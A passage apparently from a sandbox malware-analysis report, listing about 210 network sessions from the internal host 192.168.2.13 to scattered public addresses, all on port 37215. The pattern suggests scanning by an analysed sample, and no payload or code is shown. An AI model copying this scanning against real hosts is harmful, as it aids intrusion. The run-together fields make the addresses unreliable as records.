                                                  8665192.168.2.1348352197.16.166.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8666192.168.2.1355274197.49.189.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8667192.168.2.1360648197.65.217.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8668192.168.2.135995641.252.110.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8669192.168.2.1350376120.206.150.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8670192.168.2.1337324197.249.162.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8671192.168.2.133797841.137.241.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8672192.168.2.1350494157.142.165.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8673192.168.2.1335202113.2.178.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8674192.168.2.134895041.208.213.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8675192.168.2.1334652157.65.52.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8676192.168.2.1351030197.120.135.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8677192.168.2.1343172157.19.64.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8678192.168.2.1334306197.143.38.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8679192.168.2.135971843.70.208.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8680192.168.2.1358972197.138.21.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8681192.168.2.1338210157.149.85.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8682192.168.2.1351428120.81.40.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8683192.168.2.134503241.191.32.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8684192.168.2.1349964197.149.163.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8685192.168.2.134718267.1.128.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8686192.168.2.1357634110.66.150.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8687192.168.2.133927041.107.108.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8688192.168.2.1357420173.138.173.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8689192.168.2.1341734120.134.186.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8690192.168.2.1335012197.165.55.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8691192.168.2.1339396157.160.188.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8692192.168.2.1338710157.176.25.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8693192.168.2.1339610197.40.141.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8694192.168.2.1349960153.232.213.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8695192.168.2.135710836.17.118.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8696192.168.2.1336832157.198.222.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8697192.168.2.134854641.93.179.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8698192.168.2.1337312157.181.106.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8699192.168.2.134478897.155.208.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8700192.168.2.134134841.0.104.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8701192.168.2.1349690196.203.133.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8702192.168.2.1359570197.3.249.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8703192.168.2.134385841.159.0.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8704192.168.2.1334864157.141.219.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8705192.168.2.13380822.250.86.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8706192.168.2.135007219.89.111.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8707192.168.2.135153841.90.211.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8708192.168.2.134316441.154.195.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8709192.168.2.1339922197.167.125.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8710192.168.2.1333198197.64.120.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8711192.168.2.1353282157.239.14.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8712192.168.2.133336841.92.40.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8713192.168.2.1350834199.245.7.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8714192.168.2.1358524197.167.253.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8715192.168.2.1358114157.224.69.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8716192.168.2.135286041.142.68.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8717192.168.2.1342422197.5.63.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8718192.168.2.1346736186.36.65.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8719192.168.2.134922841.72.104.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8720192.168.2.135611841.43.36.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8721192.168.2.1352464197.26.118.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8722192.168.2.133472041.197.14.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8723192.168.2.1350992157.199.162.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8724192.168.2.133798490.241.186.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8725192.168.2.1352922157.132.199.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8726192.168.2.1345370197.163.56.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8727192.168.2.1335632157.242.250.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8728192.168.2.135195841.53.213.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8729192.168.2.1342622197.192.255.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8730192.168.2.1336004157.171.63.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8731192.168.2.1357042154.139.246.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8732192.168.2.1335554197.81.250.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8733192.168.2.1345428157.133.231.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8734192.168.2.135014841.157.224.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8735192.168.2.1356390165.77.93.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8736192.168.2.1339954157.79.117.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8737192.168.2.1343014157.91.117.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8738192.168.2.135419641.230.63.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8739192.168.2.1340628197.247.218.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8740192.168.2.1337606157.147.214.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8741192.168.2.134573231.58.129.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8742192.168.2.135912019.230.133.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8743192.168.2.1341018157.22.227.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8744192.168.2.134478241.218.119.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8745192.168.2.1357842157.213.148.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8746192.168.2.1356012197.107.180.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8747192.168.2.1354772197.151.123.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8748192.168.2.1340852197.238.45.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8749192.168.2.1342852197.176.43.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8750192.168.2.1335962197.52.252.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8751192.168.2.134428223.180.81.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8752192.168.2.13505505.247.232.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8753192.168.2.1343840157.230.191.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8754192.168.2.135314264.119.50.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8755192.168.2.133410041.30.145.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8756192.168.2.133746041.117.13.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8757192.168.2.135903041.1.171.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8758192.168.2.1353252197.81.110.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8759192.168.2.1335256200.134.63.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8760192.168.2.1350354197.115.155.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8761192.168.2.1350818157.96.217.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8762192.168.2.1341474213.97.200.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8763192.168.2.135215014.145.204.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8764192.168.2.1338474119.76.67.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8765192.168.2.134313841.121.99.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8766192.168.2.133324041.32.72.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8767192.168.2.1337046197.177.105.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8768192.168.2.136019841.116.110.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8769192.168.2.133363041.110.55.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8770192.168.2.134253241.42.247.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8771192.168.2.133756841.87.228.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8772192.168.2.1360258157.18.23.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8773192.168.2.1342432157.236.165.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8774192.168.2.135387064.162.33.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8775192.168.2.133680047.131.126.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8776192.168.2.134645841.205.32.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8777192.168.2.1333030197.144.133.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8778192.168.2.135298241.114.27.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8779192.168.2.1338592157.229.205.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8780192.168.2.1343154197.109.198.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8781192.168.2.134045041.69.253.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8782192.168.2.1341618197.102.105.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8783192.168.2.133887841.45.1.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8784192.168.2.1360134150.43.180.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8785192.168.2.1356434197.213.180.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8786192.168.2.134461248.190.234.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8787192.168.2.1337106157.253.134.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8788192.168.2.1343482157.15.189.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8789192.168.2.134333641.106.26.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8790192.168.2.1341030120.23.79.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8791192.168.2.1359538198.14.194.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8792192.168.2.1342528168.145.138.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8793192.168.2.1346426197.60.79.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8794192.168.2.1357788138.213.158.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8795192.168.2.1335914157.254.157.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8796192.168.2.135071441.76.247.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8797192.168.2.1344530197.23.234.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8798192.168.2.1337822197.95.69.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8799192.168.2.136036041.227.188.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8800192.168.2.1357602197.101.56.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8801192.168.2.1357712157.94.137.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8802192.168.2.1358132157.113.115.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8803192.168.2.1351772197.234.176.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8804192.168.2.1358170188.141.241.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8805192.168.2.133653241.18.62.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8806192.168.2.1357596197.159.50.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8807192.168.2.1336924157.126.248.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8808192.168.2.134774641.116.205.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8809192.168.2.135939441.89.230.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8810192.168.2.135769041.174.210.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8811192.168.2.1344094157.199.2.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8812192.168.2.1352562147.106.116.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8813192.168.2.134350841.130.211.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8814192.168.2.1357944157.175.15.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8815192.168.2.133512641.61.132.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8816192.168.2.1348102200.78.92.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8817192.168.2.1337930197.155.39.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8818192.168.2.1336404157.220.19.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8819192.168.2.1350868197.40.227.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8820192.168.2.134468041.36.255.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8821192.168.2.1337502197.8.205.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8822192.168.2.135008041.162.50.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8823192.168.2.1337104157.172.41.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8824192.168.2.135062241.128.14.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8825192.168.2.1351586197.203.26.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8826192.168.2.133464883.247.82.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8827192.168.2.1358436157.148.114.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8828192.168.2.135933251.113.62.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8829192.168.2.1342426157.118.204.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8830192.168.2.1336580197.15.101.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8831192.168.2.1341656197.189.234.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8832192.168.2.1346344197.64.73.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8833192.168.2.1346520133.98.217.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8834192.168.2.1360312157.255.93.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8835192.168.2.1343304197.110.70.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8836192.168.2.1338694157.154.103.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8837192.168.2.136094841.79.34.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8838192.168.2.1334878166.99.201.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8839192.168.2.134533841.89.57.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8840192.168.2.1354808197.244.129.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8841192.168.2.135381041.157.195.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8842192.168.2.1348498157.182.14.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8843192.168.2.1356134197.22.95.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8844192.168.2.136051641.38.3.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8845192.168.2.135365441.132.53.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8846192.168.2.1341946100.209.242.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8847192.168.2.134099441.178.91.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8848192.168.2.1356354157.198.82.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8849192.168.2.1350456157.227.0.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8850192.168.2.1335100157.49.230.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8851192.168.2.1343050178.10.128.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8852192.168.2.135646441.31.125.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8853192.168.2.1354190157.11.42.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8854192.168.2.1338326157.111.75.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8855192.168.2.1350240197.121.150.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8856192.168.2.135023241.206.126.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8857192.168.2.135489641.113.90.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8858192.168.2.1340610222.22.122.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8859192.168.2.133746841.71.192.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8860192.168.2.1343954206.15.163.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8861192.168.2.134541441.74.168.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8862192.168.2.1358062157.184.215.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8863192.168.2.1341890197.224.237.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8864192.168.2.1333728197.20.248.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8865192.168.2.136046463.174.164.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8866192.168.2.135093841.241.135.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8867192.168.2.133530841.227.98.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8868192.168.2.1348326197.246.248.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8869192.168.2.1339450197.108.36.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8870192.168.2.1351630157.74.148.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8871192.168.2.1354978157.248.9.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8872192.168.2.1335902157.62.214.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8873192.168.2.1338850150.16.193.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8874192.168.2.1350690197.229.75.8537215
